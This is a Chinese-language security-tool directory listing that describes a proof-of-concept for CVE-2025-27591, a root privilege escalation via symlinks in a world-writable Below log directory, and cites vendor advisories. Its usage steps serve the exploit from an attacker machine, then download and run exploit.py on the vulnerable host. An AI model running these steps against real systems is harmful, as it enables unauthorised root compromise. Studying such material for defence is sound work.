Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-27591-PoC — CVE-2025-27591 是一个权限提升漏洞,影响 Below 服务 0.9.0 版本之前的版本。 | Kitploit
工具/GitHubGitHub/bridgeralderson/cve-2025-27591-poc
权限提升漏洞分析漏洞利用渗透测试学习与教育
GitHubbridgeralderson/cve-2025-27591-poc

CVE-2025-27591-PoC

CVE-2025-27591 是一个权限提升漏洞,影响 Below 服务 0.9.0 版本之前的版本。

查看仓库
32211年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-27591 概念验证

CVE-2025-27591 是一个权限提升漏洞,影响了低于 0.9.0 版本的 Below 服务。问题源于在 /var/log/below 目录下创建了一个全局可写目录。攻击者可以通过操作该目录中的符号链接来利用此漏洞,并有可能获取 root 权限,这对本地非特权用户构成重大安全威胁。

此概念验证代码仅用于教育和研究目的。

在编写本文时,社区中尚无该漏洞的公开 PoC。因此,我决定负责任地分享此实现,以填补这一空白,为安全研究生态系统做出贡献,并提高人们对不安全文件系统关键性质的认识。

漏洞成因

image

概念验证

在攻击者机器上:

1- git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git

2- cd CVE-2025-27591-PoC

3- python3 -m http.server 80

在易受攻击的系统上:

1- wget http:///exploit.py

2- python exploit.py

image

参考资料

https://www.facebook.com/security/advisories/cve-2025-27591 https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3

下载工具